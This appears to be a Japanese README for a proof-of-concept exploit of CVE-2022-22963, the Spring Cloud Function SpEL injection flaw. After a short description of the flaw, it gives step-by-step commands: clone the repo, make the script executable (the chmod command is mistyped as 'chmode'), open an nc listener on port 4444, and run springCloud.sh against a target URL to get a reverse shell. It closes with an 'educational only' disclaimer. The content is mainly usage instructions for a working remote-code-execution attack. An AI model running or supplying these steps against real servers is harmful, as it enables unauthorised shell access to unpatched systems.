
CVE-2022-22963 の概念実証エクスプロイト。Spring Cloud Function の SpEL インジェクションによりリモートコード実行を引き起こすものです。リバースシェルペイロードによる自動エクスプロイトのためのシェルスクリプトを含みます。
Spring Cloud Function のバージョン 3.1.6、3.2.2 およびそれ以前のバージョンでは、ルーティング機能を使用する際に、ユーザーが特別に細工された SpEL をルーティング式として提供することが可能であり、その結果、リモートコード実行やローカルリソースへのアクセスが生じる可能性があります。
リポジトリをクローンする
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
フォルダに入る
cd CVE-2022-22963
実行権限を変更する
chmode +x springCloud.sh
希望のポートでncを起動する
nc -nlvp 4444
次のコマンドを実行し、パラメータを必要に応じて変更する
./springCloud.sh url lhost lport
注: このリポジトリの使用は使用者の責任であり、作者の責任ではありません。教育目的のみです。